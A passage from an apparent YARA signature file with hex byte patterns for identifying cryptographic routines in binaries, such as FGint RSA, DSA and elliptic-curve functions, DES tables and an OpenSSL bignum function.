4D E0 89 4D E4 89 4D EC 8B DA 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 0F 42 45 00 64 FF 30 64 89 20 EB 12 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 8B 45 FC 8A 00 2C 2D 74 11 04 FD 2C 0A 72 0B 8B 45 FC E8 ?? ?? ?? ?? 48 7F D4 8D 45 E4 50 B9 01 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 45 E4 BA 28 42 45 00 E8 ?? ?? ?? ?? 75 18 C6 45 EB 00 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? EB 18 C6 45 EB 01 }\r\n\t\t$c2 = { 55 8B EC 83 C4 D8 53 56 33 C9 89 4D D8 89 4D DC 89 4D E0 89 4D F8 89 4D F4 8B DA 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 A6 32 47 00 64 FF 30 64 89 20 EB 12 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 8B 45 FC 0F B6 00 2C 2D 74 11 04 FD 2C 0A 72 0B 8B 45 FC E8 ?? ?? ?? ?? 48 7F D3 8D 45 E0 50 B9 01 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 45 E0 BA BC 32 47 00 E8 ?? ?? ?? ?? 75 18 C6 45 E9 00 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 
EB 18 C6 45 E9 01 }\r\n\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_ConvertBase256to64\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint ConvertBase256to64\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 EC FB FF FF 53 56 57 33 C9 89 8D EC FB FF FF 89 8D F0 FB FF FF 89 4D F8 8B FA 89 45 FC B9 00 01 00 00 8D 85 F4 FB FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 F4 FB FF FF BA FF 00 00 00 E8 ?? ?? ?? ?? 8D 45 F8 E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 8B D8 85 DB 7E 2F BE 01 00 00 00 8D 45 F8 8B 55 FC 0F B6 54 32 FF 8B 94 95 F4 FB FF FF E8 ?? ?? ?? ?? 46 4B 75 E5 EB }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ConvertHexStringToBase256String\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint ConvertHexStringToBase256String\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F0 53 56 33 C9 89 4D F0 89 55 F8 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 F8 E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? D1 F8 79 03 83 D0 00 85 C0 7E 5F 89 45 F4 BE 01 00 00 00 8B C6 03 C0 8B 55 FC 8A 54 02 FF 8B 4D FC 8A 44 01 FE 3C 3A 73 0A 8B D8 80 EB 30 C1 E3 04 EB 08 8B D8 80 EB 37 C1 E3 04 80 FA 3A 73 07 80 EA 30 0A DA EB 05 80 EA 37 0A DA 8D 45 F0 8B D3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_Base256StringToGInt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint Base256StringToGInt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 F8 FB FF FF 53 56 57 33 C9 89 4D F8 8B FA 89 45 FC 8B 45 FC ?? ?? ?? ?? ?? B9 00 01 00 00 8D 85 F8 FB FF FF 8B 15 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 55 ?? ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 F8 ?? ?? ?? ?? ?? 8D 85 F8 FB FF FF BA FF 00 00 00 ?? ?? ?? ?? ?? 8B 45 FC ?? ?? ?? ?? ?? 8B D8 85 DB 7E 34 BE 01 00 00 00 8D 45 F8 8B 55 FC 0F B6 54 32 FF 8B 94 95 F8 FB FF FF ?? ?? ?? ?? ?? 
46 4B 75 E5 EB 12 8D 45 F8 B9 01 00 00 00 BA 01 00 00 00 ?? ?? ?? ?? ?? 8B 45 F8 80 38 30 75 0F }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_FGIntToBase256String\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint FGIntToBase256String\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 33 C9 51 51 51 51 53 56 8B F2 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 FC E8 ?? ?? ?? ?? EB 10 8D 45 FC 8B 4D FC BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 25 07 00 00 80 79 05 48 83 C8 F8 40 85 C0 75 D8 8B 45 FC E8 ?? ?? ?? ?? 8B D8 85 DB 79 03 83 C3 07 C1 FB 03 8B C6 E8 ?? ?? ?? ?? 85 DB 76 4B 8D 45 F4 50 B9 08 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 55 F4 8D 45 FB E8 ?? ?? ?? ?? 8D 45 F0 8A 55 FB E8 ?? ?? ?? ?? 8B 55 F0 8B C6 E8 ?? ?? ?? ?? 8D 45 FC B9 08 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 4B 75 B5 }\r\n\t\t$c1 = { 55 8B EC 33 C9 51 51 51 51 53 56 8B F2 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 FC E8 ?? ?? ?? ?? EB 10 8D 45 FC 8B 4D FC BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 25 07 00 00 80 79 05 48 83 C8 F8 40 85 C0 75 D8 8B 45 FC 85 C0 74 05 83 E8 04 8B 00 8B D8 85 DB 79 03 83 C3 07 C1 FB 03 8B C6 E8 ?? ?? ?? ?? 85 DB 76 4C 8D 45 F4 50 B9 08 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 55 F4 8D 45 FB E8 ?? ?? ?? ?? 8D 45 F0 0F B6 55 FB E8 ?? ?? ?? ?? 8B 55 F0 8B C6 E8 ?? ?? ?? ?? 8D 45 FC B9 08 00 00 00 BA 01 00 00 00 E8 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_ConvertBase256StringToHexString\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint ConvertBase256StringToHexString\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 33 C9 51 51 51 51 51 51 53 56 57 8B F2 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B C6 E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 
8B F8 85 FF 0F 8E AB 00 00 00 C7 45 F8 01 00 00 00 8B 45 FC 8B 55 F8 8A 5C 10 FF 33 C0 8A C3 C1 E8 04 83 F8 0A 73 1E 8D 45 F4 33 D2 8A D3 C1 EA 04 83 C2 30 E8 ?? ?? ?? ?? 8B 55 F4 8B C6 E8 ?? ?? ?? ?? EB 1C 8D 45 F0 33 D2 8A D3 C1 EA 04 83 C2 37 E8 ?? ?? ?? ?? 8B 55 F0 8B C6 E8 ?? ?? ?? ?? 8B C3 24 0F 3C 0A 73 22 8D 45 EC 8B D3 80 E2 0F 81 E2 FF 00 00 00 83 C2 30 E8 ?? ?? ?? ?? 8B 55 EC 8B C6 E8 ?? ?? ?? ?? EB 20 8D 45 E8 8B D3 80 E2 0F 81 E2 FF 00 00 00 83 C2 37 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule FGint_PGPConvertBase256to64\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint PGPConvertBase256to64\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 E8 FB FF FF 53 56 57 33 C9 89 8D E8 FB FF FF 89 4D F8 89 4D F4 89 4D F0 8B FA 89 45 FC B9 00 01 00 00 8D 85 EC FB FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 EC FB FF FF BA FF 00 00 00 E8 ?? ?? ?? ?? 8D 45 F8 E8 ?? ?? ?? ?? 8B 45 FC 8B 00 E8 ?? ?? ?? ?? 8B D8 85 DB 7E 22 BE 01 00 00 00 8D 45 F8 8B 55 FC 8B 12 0F B6 54 32 FF 8B 94 95 EC FB FF FF E8 ?? ?? ?? ?? 46 4B 75 E3 8B 45 F8 E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 85 D2 75 0A 8D 45 F0 E8 ?? ?? ?? ?? EB 4B 8B 45 F8 E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 83 FA 04 75 1C 8D 45 F8 BA 4C 33 40 00 E8 ?? ?? ?? ?? 8D 45 F0 BA 58 33 40 00 E8 ?? ?? ?? ?? EB 1A 8D 45 F8 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 8B D8 85 DB 7E 57 8D 45 F4 50 B9 06 00 00 00 BA 01 00 00 00 8B 45 F8 E8 ?? ?? ?? ?? 8D 45 EC 8B 55 F4 E8 ?? ?? ?? ?? 8D 85 E8 FB FF FF 8B 55 EC 8A 92 ?? ?? ?? ?? E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule FGint_RSAEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint RSAEncrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 D0 53 56 57 33 DB 89 5D D0 89 5D DC 89 5D D8 89 5D D4 8B F9 89 55 F8 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 
8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 E0 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 DC 8B C7 E8 ?? ?? ?? ?? 8B 45 DC E8 ?? ?? ?? ?? 8B D8 8D 55 DC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 DC 8B 4D DC BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F3 4E EB 10 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_RsaDecrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"FGint RsaDecrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 A0 53 56 57 33 DB 89 5D A0 89 5D A4 89 5D A8 89 5D B4 89 5D B0 89 5D AC 89 4D F8 8B FA 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_RSAVerify\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"FGint RSAVerify\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E0 53 56 8B F1 89 55 F8 89 45 FC 8B 5D 0C 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 E8 8B 45 F8 E8 ?? ?? ?? ?? 8D 55 F0 8B 45 FC E8 ?? ?? ?? ?? 8D 4D E0 8B D3 8D 45 F0 E8 ?? ?? ?? ?? 8D 55 F0 8D 45 E0 E8 ?? ?? ?? ?? 8D 45 E0 50 8B CB 8B D6 8D 45 E8 E8 ?? ?? ?? ?? 8D 55 E8 8D 45 E0 E8 ?? ?? ?? ?? 8D 55 F0 8D 45 E8 E8 ?? ?? ?? ?? 3C 02 8B 45 08 0F 94 00 8D 45 E8 E8 ?? ?? ?? ?? 8D 45 F0 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? B9 03 00 00 00 E8 ?? ?? ?? ?? 8D 45 F8 BA 02 00 00 00 E8 ?? ?? ?? ?? 
C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_FindPrimeGoodCurveAndPoint\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint FindPrimeGoodCurveAndPoint\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F4 53 56 57 33 DB 89 5D F4 89 4D FC 8B FA 8B F0 33 C0 55 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ECElGamalEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint ECElGamalEncrypt\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 3C FF FF FF 53 56 57 33 DB 89 5D D8 89 5D D4 89 5D D0 8B 75 10 8D 7D 8C A5 A5 A5 A5 A5 8B 75 14 8D 7D A0 A5 A5 A5 A5 A5 8B 75 18 8D 7D DC A5 A5 8B 75 1C 8D 7D E4 A5 A5 8B F1 8D 7D EC A5 A5 8B F2 8D 7D F4 A5 A5 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 A0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 8C 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 78 FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 64 FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 50 FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 3C FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 7D CF }\r\n\t\t$c1 = { 55 8B EC 83 C4 A8 53 56 57 33 DB 89 5D A8 89 5D AC 89 5D BC 89 5D B8 89 5D B4 89 4D F4 89 55 F8 89 45 FC 8B 75 0C 8B 45 FC E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 71 14 41 00 64 FF 30 64 89 20 8D 55 BC 8B C6 E8 ?? ?? ?? ?? 8B 45 BC E8 ?? ?? ?? ?? 8B D8 8D 55 BC 8B 45 FC E8 ?? ?? ?? ?? 
8D 45 BC 8B 4D BC BA 8C 14 41 00 E8 ?? ?? ?? ?? 8B FB 4F EB 10 8D 45 BC 8B 4D BC BA 98 14 41 00 E8 ?? ?? ?? ?? 8B 45 BC }\r\n\tcondition:\r\n\t\t$c0 or $c1\r\n}\r\n\r\nrule FGint_ECAddPoints\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint ECAddPoints\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 A8 53 56 57 8B 75 0C 8D 7D F0 A5 A5 8B F1 8D 7D F8 A5 A5 8B F2 8D 7D A8 A5 A5 A5 A5 A5 8B F0 8D 7D BC A5 A5 A5 A5 A5 8B 5D 08 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 A8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ECPointKMultiple\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint ECPointKMultiple\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 BC 53 56 57 33 DB 89 5D E4 8B 75 0C 8D 7D E8 A5 A5 8B F1 8D 7D F0 A5 A5 8B F2 8D 7D F8 A5 A5 8B F0 8D 7D D0 A5 A5 A5 A5 A5 8B 5D 08 8D 45 D0 8B 15 ?? ?? ?? 00 E8 ?? ?? ?? ?? 8D 45 F8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ECPointDestroy\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint ECPointDestroy\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B D8 8B C3 E8 ?? ?? ?? ?? 8D 43 08 E8 ?? ?? ?? ?? 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DSAPrimeSearch\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint DSAPrimeSearch\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 DC 53 56 8B DA 8B F0 8D 45 F8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 
8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 4D F8 8B D6 8B C6 E8 ?? ?? ?? ?? 8D 4D E8 8B D6 8B C3 E8 ?? ?? ?? ?? 8D 55 F0 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D E0 8D 55 E8 8B C3 E8 ?? ?? ?? ?? 8D 45 E8 E8 ?? ?? ?? ?? 8D 4D E8 8D 55 F0 8D 45 E0 E8 ?? ?? ?? ?? 8D 45 E0 E8 ?? ?? ?? ?? 8D 45 F0 E8 ?? ?? ?? ?? 8B 45 EC 8B 40 04 83 E0 01 85 C0 75 18 8D 4D E0 8B D6 8D 45 E8 E8 ?? ?? ?? ?? 8D 55 E8 8D 45 E0 E8 ?? ?? ?? ?? 8B D3 8D 45 E8 E8 ?? ?? ?? ?? C6 45 DF 00 EB 26 8D 4D E8 8D 55 F8 8B C3 E8 ?? ?? ?? ?? 8B D3 8D 45 E8 E8 ?? ?? ?? ?? 8D 4D DF 8B C3 BA 05 00 00 00 E8 ?? ?? ?? ?? 80 7D DF 00 74 D4 8D 45 F8 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? B9 04 00 00 00 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DSASign\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint DSASign\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 CC 53 56 57 89 4D FC 8B DA 8B F8 8B 75 14 8B 45 10 E8 ?? ?? ?? ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 CC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 F4 50 8B CF 8B D6 8B 45 FC E8 ?? ?? ?? ?? 8D 4D D4 8B D3 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? 8D 4D F4 8B D3 8B C6 E8 ?? ?? ?? ?? 8D 55 EC 8B 45 10 E8 ?? ?? ?? ?? 8D 45 E4 50 8B CB 8D 55 D4 8B 45 18 E8 ?? ?? ?? ?? 8D 4D DC 8D 55 E4 8D 45 EC E8 ?? ?? ?? ?? 8D 45 EC E8 ?? ?? ?? ?? 8D 45 E4 E8 ?? ?? ?? ?? 8D 45 CC 50 8B CB 8D 55 DC 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 DC E8 ?? ?? ?? ?? 8B 55 0C 8D 45 D4 E8 ?? ?? ?? ?? 8B 55 08 8D 45 CC E8 ?? ?? ?? ?? 8D 45 D4 E8 ?? ?? ?? ?? 8D 45 CC E8 ?? ?? ?? ?? 
33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 CC 8B 15 ?? ?? ?? ?? B9 06 00 00 00 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DSAVerify\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint DSAVerify\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 B4 53 56 57 89 4D FC 8B DA 8B F0 8B 7D 08 8B 45 14 E8 ?? ?? ?? ?? 8B 45 10 E8 ?? ?? ?? ?? 8B 45 0C E8 ?? ?? ?? ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 CC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 CC 8B 45 0C E8 ?? ?? ?? ?? 8D 4D F4 8B D3 8D 45 CC E8 ?? ?? ?? ?? 8D 55 C4 8B 45 14 E8 ?? ?? ?? ?? 8D 45 EC 50 8B CB 8D 55 F4 8D 45 C4 E8 ?? ?? ?? ?? 8D 45 C4 E8 ?? ?? ?? ?? 8D 55 D4 8B 45 10 E8 ?? ?? ?? ?? 8D 45 E4 50 8B CB 8D 55 F4 8D 45 D4 E8 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 C4 50 8B CE 8D 55 EC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 BC 50 8B CE 8D 55 E4 8B 45 18 E8 ?? ?? ?? ?? 8D 45 B4 50 8B CE 8D 55 BC 8D 45 C4 E8 ?? ?? ?? ?? 
8D 45 C4 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule DES_Long\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"DES [long]\"\r\n\tstrings:\r\n\t\t$c0 = { 10 80 10 40 00 00 00 00 00 80 10 00 00 00 10 40 10 00 00 40 10 80 00 00 00 80 00 40 00 80 10 00 00 80 00 00 10 00 10 40 10 00 00 00 00 80 00 40 10 00 10 00 00 80 10 40 00 00 10 40 10 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DES_sbox\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"DES [sbox]\"\r\n\tstrings:\r\n\t\t$c0 = { 00 04 01 01 00 00 00 00 00 00 01 00 04 04 01 01 04 00 01 01 04 04 01 00 04 00 00 00 00 00 01 00 00 04 00 00 00 04 01 01 04 04 01 01 00 04 00 00 04 04 00 01 04 00 01 01 00 00 00 01 04 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DES_pbox_long\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"DES [pbox] [long]\"\r\n\tstrings:\r\n\t\t$c0 = { 0F 00 00 00 06 00 00 00 13 00 00 00 14 00 00 00 1C 00 00 00 0B 00 00 00 1B 00 00 00 10 00 00 00 00 00 00 00 0E 00 00 00 16 00 00 00 19 00 00 00 04 00 00 00 11 00 00 00 1E 00 00 00 09 00 00 00 01 00 00 00 07 00 00 00 17 00 00 00 0D 00 00 00 1F 00 00 00 1A 00 00 00 02 00 00 00 08 00 00 00 12 00 00 00 0C 00 00 00 1D 00 00 00 05 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp2_mont\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp2_mont\"\r\n\tstrings:\r\n\t\t$c0 = { B8 30 05 00 00 E8 ?? ?? ?? ?? 8B 84 24 48 05 00 00 53 33 DB 56 8B 08 57 89 5C 24 24 89 5C 24 30 8A 01 89 5C 24 28 A8 01 89 5C 24 0C 75 24 68 89 00 00 00 68 ?? ?? ?? ?? 6A 66 6A 76 6A 03 E8 ?? ?? ?? ?? 83 C4 14 33 C0 5F 5E 5B 81 C4 30 05 00 00 C3 8B 94 24 48 05 00 00 52 E8 ?? ?? ?? ?? 8B F0 8B 84 24 54 05 00 00 50 E8 ?? ?? ?? ?? 83 C4 08 3B F3 8B F8 75 20 3B FB 75 1C 8B 8C 24 40 